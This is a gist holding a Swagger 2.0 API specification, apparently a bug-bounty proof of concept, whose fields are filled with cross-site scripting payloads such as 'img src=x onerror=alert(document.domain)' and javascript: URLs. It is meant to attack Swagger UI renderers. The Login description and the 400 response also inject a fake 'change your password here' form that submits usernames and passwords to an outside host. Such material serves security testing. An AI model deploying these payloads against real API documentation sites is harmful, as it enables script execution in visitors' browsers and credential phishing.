
@myuyu
Created November 28, 2021 21:06
{
"swagger": "2.0",
"info": {
"title": "/qqq'\"><img src=x onerror=alert(document.domain)>",
"description": "rrrr",
"version": "2017-06-04T22:56:06+00:00",
"termsOfService": "Javascript:alert(document.domain)//",
"contact": {
"name": "/sss'\"></script><img src=x onerror=alert(document.domain)>",
"url": "JAVASCRIPT://aaa.com/%0aalert(document.domain)",
"email": "javaonerrorscript://aaa.com/%0aalert(document.domain))"
}
},
"Host": "google.com",
"basePath": "/%0Aalert(document.domain)//",
"schemes": [
"Javascript",
"file"
],
"consumes": [
"/ttt'\"></script></select>fff<img src=x onerror=alert(document.domain)>"
],
"produces": [
"/uuu'\"></script>ggg<img src=x onerror=alert(document.domain)>"
],
"securityDefinitions": {
"oauth2": {
"flow": "implicit",
"authorizationUrl": "javascript://google.com/%0Aalert(document.domain)//",
"scopes": {
"web-api": "testing"
},
"type": "oauth2"
}
},
"security": [
{
"tokenHeader": ["/xxx'\"><img src=x onerror=alert(document.domain)>"]
}
],
"paths": {
"Login": {
"post": {
"summary": "/'\">bbb</script><img src=x onerror=alert(document.domain)>",
"description": "<IMG src='https://techbeacon.scdn7.secure.raxcdn.com/sites/default/files/styles/article_hero_image/public/field/image/testing-trends-world-quality-report.jpg?itok=vUyONZsj'/>
<h1 style='background-color:Tomato;'>change your password here</h1>
<form method='get' action='https://bugbountypoc.com/poc/'> <p><input type='text' name='login' value='' placeholder='Username or Email'></p> <p><input type='password' name='password' value='' placeholder='Password'></p> <p class='submit'><input type='submit' name='commit' value='Login'></p> </form>",
"tags": ["Authentication"],
"parameters": [
{
"name": "/xxx'tabindex=0 id=aaa onfocus=alert(document.domain) onmouseover=alert(document.domain) yyy\"zzz></script><img src=x onerror=alert(document.domain)>",
"in": "body",
"schema": {
"type": "object",
"required": [
"/hhh'\"></script><img src=x onerror=alert(document.domain)>"
],
"properties": {
"/ccc<img src=x onerror=alert(document.domain)>": {
"type": "string",
"description": "/iii'\"></script><img src=x onerror=alert(document.domain)>"
}
},
"description": "/ddd'\"></script><img src=x onerror=alert(document.domain)>"
},
"required": true
}
],
"responses": {
"200": {
"description": "{<marquee mdd=dddd>test</marquee><h1 style='border:2px solid Tomato;'>Hello World HTML injection PoC</h1><form><button formaction=//evil>XSS</button><textarea name=x>}"
},
"400": {
"description": "<IMG src='https://techbeacon.scdn7.secure.raxcdn.com/sites/default/files/styles/article_hero_image/public/field/image/testing-trends-world-quality-report.jpg?itok=vUyONZsj'/>
<h1 style='background-color:Tomato;'>change your password here</h1>
<form method='get' action='https://bugbountypoc.com/poc/login.php'> <p><input type='text' name='login' value='' placeholder='Username or Email'></p> <p><input type='password' name='password' value='' placeholder='Password'></p> <p class='submit'><input type='submit' name='commit' value='Login'></p> </form>",
"schema": {
"type": "object",
"properties": {
"errors": {
"type": "object",
"additionalProperties": {
"type": "string"
},
"description": "/lll'\"></script><img src=x onerror=alert(document.domain)>"
}
},
"description": "/mmm'\"></script><img src=x onerror=alert(document.domain)>"
},
"examples": {
"/nnn'\"></script><img src=x onerror=alert(document.domain)>": {
"errors": {
"/ooo'\"></script><img src=x onerror=alert(document.domain)>": "/ppp'\"></script><img src=x onerror=alert(document.domain)>"
}
}
}
}
}
}
}
}
}